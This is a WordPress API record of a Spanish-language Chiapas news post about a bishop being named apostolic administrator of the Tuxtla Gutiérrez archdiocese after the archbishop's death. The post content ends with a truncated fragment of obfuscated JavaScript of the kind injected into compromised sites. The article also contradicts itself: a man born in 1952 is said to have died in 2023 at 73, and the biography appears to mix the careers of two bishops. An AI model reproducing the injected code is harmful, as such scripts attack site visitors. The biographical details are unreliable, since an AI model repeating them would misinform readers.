{"id":12917,"date":"2023-11-29T02:02:41","date_gmt":"2023-11-29T02:02:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12917"},"modified":"2023-11-29T02:02:42","modified_gmt":"2023-11-29T02:02:42","slug":"nombran-al-obispo-de-la-diocesis-de-san-cristobal-administrador-apostolico-de-la-arquidiocesis-de-tuxtla-gutierrez","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12917","title":{"rendered":"Nombran al obispo de la Di\u00f3cesis de San Crist\u00f3bal, administrador Apost\u00f3lico de la Arquidi\u00f3cesis de Tuxtla Guti\u00e9rrez"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"604\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1701223179166.jpg\" alt=\"\" class=\"wp-image-12918\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1701223179166.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/FB_IMG_1701223179166-300x252.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>28 de Noviembre del 2023. \u00d3scar G\u00f3mez\/ Corresponsal SCLC.- &#8220;Nos alegra comunicarles que la Santa Sede ha nombrado al nuevo Administrador Apost\u00f3lico de nuestra Arquidi\u00f3cesis. Bienvenido Mons. Rodrigo, damos gracias al Se\u00f1or por su presencia y lo recibimos con los brazos abiertos&#8221;.Lo anterior fue publicado por la Di\u00f3cesis de San Crist\u00f3bal, la noche de este lunes, luego del fallecimiento de Fabio Mart\u00ednez Castilla, obispo de Tuxtla Guti\u00e9rrez, a los 73 a\u00f1os de edad.Mons. Mart\u00ednez naci\u00f3 el 13 de marzo de 1952 en Valle Santiago y estudi\u00f3 en el Seminario de Morelia. Fue ordenado sacerdote el 25 de julio 1975 y se licenci\u00f3 en Ciencias de la Educaci\u00f3n en la Pontificia Universidad Salesiana de Roma.Ha sido secretario del Arzobispo de Morelia, formador del seminario y Secretario del Consejo Presbiteral. Ha sido tambi\u00e9n rector del Santuario San Jos\u00e9, director espiritual de seminaristas de filosof\u00eda y asistente en &#8220;Encuentros Matrimoniales&#8221;.Fue nombrado Obispo de Matehuala el 28 de mayo de 1997 y recibi\u00f3 la ordenaci\u00f3n episcopal el 31 de julio siguiente. El 28 de enero de 2006 fue trasladado a la sede de Tehuac\u00e1n.En la Conferencia Episcopal Mexicana es el Presidente de la Comisi\u00f3n de Familia y Vida, J\u00f3venes y Laicos.En noviembre de 2017, el Papa Francisco nombr\u00f3 a un obispo para M\u00e9xico, Rodrigo Aguilar Mart\u00ednez, como obispo de San Crist\u00f3bal de Las Casas (M\u00e9xico)El Papa Francisco acept\u00f3 en ese a\u00f1o, la renuncia al gobierno pastoral de la di\u00f3cesis mexicana de San Crist\u00f3bal de Las Casas presentada por Mons. Felipe Arizmendi Esquivel, y En su lugar nombrado a Mons. Rodrigo Aguilar Mart\u00ednez, quien era Obispo de Tehuac\u00e1n, Puebla.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>28 de Noviembre del 2023. \u00d3scar G\u00f3mez\/ Corresponsal SCLC.- &#8220;Nos alegra comunicarles que la Santa Sede ha nombrado al nuevo Administrador Apost\u00f3lico de nuestra Arquidi\u00f3cesis. Bienvenido Mons. Rodrigo, damos gracias al Se\u00f1or por su presencia y lo recibimos con los brazos abiertos&#8221;.Lo anterior fue publicado por la Di\u00f3cesis de San Crist\u00f3bal, la noche de este &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12918,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-12917","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12917","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12917"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12917\/revisions"}],"predecessor-version":[{"id":12919,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12917\/revisions\/12919"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12918"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12917"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12917"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12917"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}